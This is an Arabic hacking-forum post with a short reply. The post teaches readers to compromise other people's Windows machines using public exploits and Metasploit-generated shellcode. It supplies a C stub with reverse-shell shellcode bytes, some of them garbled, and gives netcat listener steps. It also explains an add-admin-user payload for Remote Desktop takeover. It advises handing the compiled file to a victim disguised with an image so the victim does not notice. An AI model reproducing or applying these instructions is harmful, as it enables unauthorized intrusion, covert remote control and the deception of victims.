منتدى الحب
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منتدى الحب

منتديات الحب
 
الرئيسيةالبوابةأحدث الصورالتسجيلدخول

 

 اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة

اذهب الى الأسفل 
2 مشترك
كاتب الموضوعرسالة
الامبراطور
مــديــــر مــنـــتــــديــــــات الأمــــبـــــراطـــــــور
مــديــــر مــنـــتــــديــــــات الأمــــبـــــراطـــــــور
الامبراطور


ذكر
عدد الرسائل : 150
العمر : 35
الموقع : www.teto87.yoo7.com
العمل/الترفيه : على النت وتجاره ودراسه
المزاج : نوب حلو ونوب مو حلو
تاريخ التسجيل : 14/07/2008

اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة Empty
مُساهمةموضوع: اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة   اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة Icon_minitimeالخميس أغسطس 21, 2008 5:00 am

.:: [ بســم اللهـ الرحمـن الرحيـم ] ::.


السلآم عليكم يآ شبآب ان شآء اللهـ, بخير , المهم اليوم رآح اشرح شرح مبسط


للثغرآت للي تنزل بالـ Milw0rm + الـ M3tasploit


( مجرد شرح بسيط وتوضيح مب كآمل )


موضوعي اليوم يتحدث عن الثغرات الطفح [ Ov3rFl0w ] و حجب الخدمة [ D0s/P0c ]

وشرح طريقة الاختراق باستخدام الشيل كود [ sh3ll c0de ]

طبعآ يآ شبآب هآي الطرق مآتنفع للاخترآق العشوآئي , بس للاخترآق المستهدف

ولآزم احيانا تحتآج آي بي الشخص المستهدف باي طريقه تجيب الأي بي مب مشكله

وعندك طريقه سحب الأي بي من المسنجر عن طريق سكربت IP G3T


والحين نبدآ بتعريف وتوضيح اهم المصطلحآت وبعدين نفصل كل شيء عشآن مآيصير اي

لخبطه بالموضوع

اول شيء نشوف طريقه تقسيم الثغرآت للي تنزل بالـ Milw0rm


نبدآ

اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة Kuqfyl08m50j



الـ Rem0te

تعتبر من اخطر واقوى انوآع الثغرآت يعني تحكم عن بعد والصرآحة هي من افضل الانوآع واسهلهآ

وهي 0-Day يعني ثغرة مميته وخطيره ويشترط وجود برنآمج بجهآز الضحيه

اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة Ubvi7o9lg1lv

الـ L0cal

يعني تطبيق محلي ويختلف شوي عن الريموت

بس يظل الريموت اقوى واحسن



اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة Nalgv94bih4g

الـ d0s/p0c

وهي ثغرات حجب الخدمة (d3nial of s3rvice)

وهو احيانا يكون مجرد تهنيق للجهآز

او يسوي له كرآش [ Cr4sh ]

بشرط يكون البرنآمج منصب ع الجهآز

مثلا لو لقيت كرآش في برنآمج PhoTo Shop ونزلت الملف

رآح يصير التهنيق / الكرآش

اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة 8eqtinu7lpm5

الـ Sh3ll c0de

هو كود لبرنآمج ويؤدي لـ / اضافه يوزر / دآونلودر , بآتش / تنفيذ اوآمر الدوس / اتصآل عكسي / اتصآل مبآشر

وحقن ملفآت الـ DLL

وهو يوجد بكل ثغرآت الريموت واللوكل عشآن نقدر نتحكم بالنظآم


وفي اشياء ثانية , بس اكثر الأشياء للي رآح نحتآجهآ هي

B!nd Sh3ll = اتصآل مبآشر

R3v3rse Sh3ll = اتصآل عكسي ( افضل واقوى )

طبعآ يآ شبآب الثغرآت تجي بمختلف لغآت البرمجه وكل ثغرى تكون غير عن ثغرة ثآنية

وطريقه التعرف ع الثغرآت وآضحة جدآ بس رآح نذكرهآ + شرح فيديو لطريقه الترجمه

ومرفقه معهم الادوآت للترجمه

يلا نبدآ

اول شيء الـ pHp ويبدآ كذآ :
والحين هذا هو شرح الفيديو : http://www.4shared.com/file/52995249...ified=50f43fe4

,

ثآني شيء الـ P3rl ويبدآ كذآ : #!/u sr/bin/P3rl

والحين شرح الترجمه : http://www.4shared.com/file/53061803...ified=50f43fe4

,

ثآلث شيء الـ C++ \C ويبدآ كذآ : #includ3 "stdio.h"

شرح الفيديو : http://www.4shared.com/file/53004375...ified=50f43fe4

,

رآبع شيء الـ
ويبدآ كذآ : #!/u sr/bin/env pyth0n

شرح الترجمه : http://www.4shared.com/file/53058230...ified=50f43fe4

,

خآمس شيء الـ Ruby ويبدآ كذآ : #!/u sr/bi n/ruby

شرح الترجمه : http://www.4shared.com/file/53055724...ified=50f43fe4


//

والحين نشرح اهم مصطلحآت للشل كود في موقع الـM3tasploit


اول شيء ندش علىآ هآي الرآبط

الرآبط :/ http://m3tasploit.com:55555/PAYLOADS?FILTER=win32

طبعآ انا مختآر نظآم ويندوز بيئة 32 بت

وهاي هو المستخدم الاكثر وتقتدر تختآر لنظآم الـ Linux اذا حبيت تخترق اجهزة بنظآم ليونكس

المهم تآبعوآ


W!nd0ws B!nd DLL I.n.j.e.c.t = يعني حقن ملف ربط دينامكي ( اتصآل مبآشر )

\

W!nd0ws B!nd Sh3ll = شل كود وضيفتهآ الأتصآل المبآشر

/

W!nd0ws E.x.e.c.u.t.a.b.l.e D.o.w.n.l.o.a.d and Ex**ute = شل كود وضيفتهآ تحميل وتنفيذ كود حلو لمحبين برآمج الأخترآق

\

W!nd0ws Ex**ute C.o.m.m.a.n.d = تنفيذ احد اوآمر الدوس , تشغيل الحاسبه او اضافه يوزر للي تبيه بالدوس

/

W!nd0ws Ex**ute net us3r /ADD = اضافه يوزر للنظآم ونقدر نسيطر عليه من الـ Rem0te D.e.s.k.t.o.b

وينفع لاصحآب اخترآق الموآقع اضافه يوزر روت

\

W!nd0ws Rev3rse DLL I.n.j.e.ct = حقن ملف ربط دينامكي ( اتصآل عكسي )

/

W!nd0ws Rev3rse Sh3ll = كود وضيفته الأتصآل العكسي ورآح يكون مستخدم بشكل كبير بالثغرآت لقوته وسيطرته

الكآمله ع النظآم

ورآح يكون الأخترآق عن طريق الـ NeTCaT يعني تسوي تنصت لين يشبك الضحية مع جهآزك

وتتقدر بعد اذا تبي يكون التبليغ ع برنآمج اخترآق

ورآح اشرح كل شيء بفقرة لحآله

//

يلا نبدآ اول شيء بالـ Rem0te


طبعآ يختلف نوع الثغرة في ثغرآت تكون بصيغه HTML ولآزم الشل كود يكون مشفر بلغه الجآفآ

اما اذا كآنت الثغرة مكتوبه بالسي عآدي نترجم علاطووووول

نختآر اي ثغرة مثلا آخر وحده نزلت : http://www.milw0rm.com/exploits/5827

طبعآ الشل كود يكون جآهز واذا مآعجبك نوع الشل كود تقدر تغيره بشرط الشل كود مآيكون كبير عن للي موجود

بالثغرة ولو كآن اصغر منه عآدي مآفي مشآكل

نبدآ نشرح تفاصيل الثغرة

اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة 158un4018snj

يعني الثغرة بلغه الـ C

اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة Ke7cytlag6l9
وهني يقولك الشل كود وظيفته الأتصآل المبآشر B!nd Sh3ll


ويفتح بورت في الجهآز 9998

وحجم الشل كود 317 بآيت يعني اذا حبيت تغير الشل كود لآزم تجيب وآحد نفس الحجم او اصغر منه

اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة S2u9zkkj664x

هني يقولك حجم الفيض بالذآكرة 10000 بآيت لاتغيره لانه حجم الثغرة كبير شوي


والحين خلصنآ للي عليك تترجم الثغرة وتطبق الثغرة اذا كنت منصب البرنآمج ورآح تشتغل معآك الثغرة زين

#########################################

الحين نروح لثغرة ثآنية وهي ثغرة ببرنآمج Xchat

وهآي الثغرة لازم تكون صيغتهآ HTML

ولآزم الشل كود يكون مشفر بلغه الجآفآ

نشرح التفاصيل

اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة Krwwc4939gka

يعني يقولك بالملاحظة لازم الشل كود ينفذ آمر تشغيل الالحاسبه

ونبدآ ننسخ الثغرة من HTML وتحت ورآح نحصل مكتةب بنص الثغرة


c.o.m.m.a.n.d "Sh3ll c.a.l.c"


يعني نسوي شل كود ينفذ آمر تشغيل الاحاسبه


ندخل ع الموقع الميتآ : http://M3tasploit.com:55555/PAYLOADS?FILTER=win32

ونختآر
اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة X1d4rwykin14


يعني تنفيذ اوآمر الدوس

ويوم تضغط ع الرآبط رآح يجيك كذآ

اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة Gtfhhyldzbq2

في المربع الاول كتب آمر الدوس وهو تشغيل الالحاسبه

والامر الثاني خله زي مآهو لاتغيره

وآخر شيء اضغط تكوين


اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة 1voanjleorxa

وبعد مآنضغط تكوين رآح يطلع لنآ الشل كود لتشغيل الالحاسبه


اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة Bfgdlcqevaxt

الحين كل شيء وآضح ننسخ الشل كود ونحطه بالثغرة .. بس قبل كل شيء

احنآ قلنآ الثغرة مكتوبه بالـ HTML

يعني مآينفع نحط شل كود مكتوب بالسي ولآزم نحول الشل كود من السي الى الجآفآ عن طريق هآي الأدآة

المكتوبه بالبيرل ( من طرح الأخ العزيز بروتو مآن )

اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة Mjlz4c66h6pf

لآحظ معآي الادآة يوم فتحته بالمفكرة

موجود دآخلهآ شل كود ولآزم نستبدل الشل كود الموجود بالادآة للي كونآه قبل شوي

الحين ننسخ الشل كود للي سوينآه ونحطه بالادآه عشآن يحول لنآ الي لغه الجآفآ عشآن المتصفح يقدر يشغله

هذآ هو ننسخه

اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة Cxhuumm88oc2

ونحطه بالادآة

وبعد مآحطينآه نحفظ الشغل كله ونحط الادآة بالسي ونترجمهآ

اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة 4dgm28upu2dz

على مأظن كل شيء وضح الحين شغلنآ الأدآة وشفر لنآ الشل كود الى الجآفآ والحين نحط هآي الكود

بالثغرة ونجرب نشغله ورآح يشتغل باذن الله

واما الأدآة للي تحول الشل كود للجآفآ حملهآ من هآي الرآبط

الرآبط :/ http://www.4shared.com/file/53069778...ified=50f43fe4

#######################################

الحين خلصنآ من ثغرآت الريموت وتكون اغلبهآ زي كذآ

واللولكل تقريبا زي الريموت ويختلف في شويه اشياء والفرق مب كبير


والحين ثغرآت حجب الخدمه الـ D0s/P0c

وهي ثغرآت مآتخليك تخترق الجهآز يعني زي مآوضحنآ قبل مجرد تهنيق او كرآش


للجهآز ومآيكون بصيغه exe

مثال هآي الثغرة

http://www.milw0rm.com/exploits/5918

الكرآش في برنآمج uTorrent

وهي مكتوبه بلغه البيرل ننسخهآ في المفكرة ونحول الصيغه الي .pl

وونقل الملف للـ c

ونترجمه ورآح يطلع لنآ زي كذآ

اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة Nlrnjhgz17j5

نكتب الأي بي وبعدين البورت وبعدين اليوزر + البآس

ورآح تشتغل وفي اكثر من طريقه

في ثغرآت بمجرد انك تعطي ملف للضحية يبدآ جهآزه يعلق ويصير له بطأ شديد


#######################################

الحين ننتقل لاحسن شيء بالموضوع الـ Sh3ll c0de


ورآح اذكر كيف تخترق بدون ثغرآت يعني بس تحتآج لشل كود خآص فيك واخترق


ولا رآح نستخدم لا ثغرى ريموت ولآ شيء

الحين روح للميتآ كالعاده كآنك تسوي شل كود والحين اختآر

Rev3rse Sh3ll = اتصآل عكسي

اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة Ulazmxb64c5z

ورآح يجيك زي كذآ تآبع

اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة Jnmrqkla4zxj

في المربع الأول اكتب آي بي جهآزك

واكتب المنفذ المفتوح عندك والحين

اضغط على تكوين

اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة 1voanjleorxa

وبعد مآتضغط على تكوين انسخ الشل كود

اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة Kcsexr1w2ctb

وحطه بين هآي الكود

كود:
#includ3
char shellcode[]=
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf3"
"\x75\x47\x94\x83\xeb\xfc\xe2\xf4\x0f\x9d\x03\x94\xf3\x75\xcc\xd1"
"\xcf\xfe\x3b\x91\x8b\x74\xa8\x1f\xbc\x**\xcc\xcb\xd3\x74\xac\xdd"
"\x78\x41\xcc\x95\x1d\x44\x87\x0d\x5f\xf1\x87\xe0\xf4\xb4\x8d\x99"
"\xf2\xb7\xac\x60\xc8\x21\x63\x90\x86\x90\xcc\xcb\xd7\x74\xac\xf2"
"\x78\x79\x0c\x1f\xac\x69\x46\x7f\x78\x69\xcc\x95\x18\xfc\x1b\xb0"
"\xf7\xb6\x76\x54\x97\xfe\x07\xa4\x76\xb5\x3f\x98\x78\x35\x4b\x1f"
"\x83\x69\xea\x1f\x9b\x7d\xac\x9d\x78\xf5\xf7\x94\xf3\x75\xcc\xfc"
"\xcf\x2a\x76\x62\x93\x23\xce\x6c\x70\xb5\x**\xc4\x9b\x85\xcd\x90"
"\xac\x1d\xdf\x6a\x79\x7b\x10\x6b\x14\x16\x26\xf8\x90\x5b\x22\xec"
"\x96\x75\x47\x94";


main()
{
void (*routine) ();
(long) routine = &shellcode;
routine();
}


بدل الشل كود للي موجود بالادآة بالشل كود للي سوينآه الحين

وبعدين احفظ الملف بآمتدآد .c

والحين ننترجم الادآة , وانا نزلت درس كيف نترجم الثغرآت الادوآت

بعد الترجمه رآح يكون الأمتدآد exe

عطه الملف اي وآحد وسوي تنصت للنت كت

ع البورت للي حطيته يوم سويت الشل كود وانا اخترت بورت 3460

للي هو بورت البيوزن مب مهم انت اختآر اي بورت ينآسبك

تآبع

اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة Nhyl0bwt6v39

نسوي تنصت نفس مآقلنآ ع البورت للي حددنآه عن طريق هآي الأمر

كود PHP:
-v -l -p




ونتكب بعد الـ p

البورت

وبعد مآشغلت الشل كود المترجم

اتصل مع جهآزي ورآح يكون كذآ

اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة Di4rqb2ltd5y

والحين نفذ اوآمر الدوس على رآحتك وتقتدر تضيف يوزر او تغير بآس الأدمن عشآن نتحكم يجهآز الضحية

عن طريق الـ Rem0te D3sktop

وللي مآفهم الشرح الشل كود يحمل الشرح فيديو من هآي الرآبط

الرآبط :/ http://www.4shared.com/file/53072945...ified=50f43fe4

واما ادآة النت كت معظمكم عنده وهو موجود مع برنآمج الـميتآ سبلويت

#############################################

والحين ننتقل لخيآر W!nd0ws Ex**ute net us3r /ADD

ويعني اضافه يوزر للنظآم وحتى اصحآب اخترآق الموآقع يقدرون بستفيدون منهآ

المهم

اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة N6l47s7pma0d

والحين بعد مآتضغط سوي زي مآهو موضح

اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة 7biatudgvhmo

في المربع الأول البآس ورد لليوزر

والثآني اسم اليوزر


وحطه بالادآة للي حطيانه للاتصآل العكسي وترجم الثغرة

وبعدين عطه لاي وآحد

واذا الضحية شغل الملف رآح ينضآف يوزر جديد للجهآز ونقدر نستفيد عن طريق التحكم عن بعد

Rem0te D3sktop

نحط آي بي ضحيتنآ وبعدين نتكب اليوزر للي انضآف للنظآم وبعدين البآس

ورآح يدش معآك وتمتع تحكم كآمل للضحية

شرح الفيديو من هآي الرآبط

الرآبط : / http://www.mediafire.com/?wje1jmenmlm

او : http://www.4shared.com/file/53079881...ified=50f43fe4

في الأخير عشآن شاشه الدوس مآتطلع لك

ادمج الملف مع برنآمج صورة اي شيء تبيه او اضغط الملف باي اداه ضغط

وان شآء الله تختفي الشاشه

يلآ شبآب اذا في خطآ بلغوني والانسآن مب معصوم عن الخطأ واذا في شيء مب وآضح قلولي عليه

وكل الشكر لاخوي العرآب علىآ مسآعدته ليــــ, < المود سيكيروتي جننـــ,ــــه

وانا نقلت الموضوع لاغلب المنتديآت للي مسجل فيهآ عشآن الفايده وانه كل منتدى زواره يختلف

عن منتدى ثآني

يلآ فمآن اللهـ,



تحياتي الامبراطور مدير المنتدى
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://teto87.yoo7.com
جريح الايام
مـــــــــشـــــرف منتدى الاسلامي
مـــــــــشـــــرف منتدى الاسلامي
جريح الايام


ذكر
عدد الرسائل : 54
العمر : 34
المزاج : ان شاء الله يعجبكم
تاريخ التسجيل : 29/07/2008

اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة Empty
مُساهمةموضوع: رد   اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة Icon_minitimeالخميس أغسطس 21, 2008 10:34 am

تعيش اخوية طه على المعلموملت الرائعة
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
اخترآق الأجهزة بطرق مختلفـــــــــــــــــــــــــــــة
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتدى الحب :: ^_^أقســــــام الهـــــــكر^_^ :: .:منتــــــدى الهكــــر:.-
انتقل الى: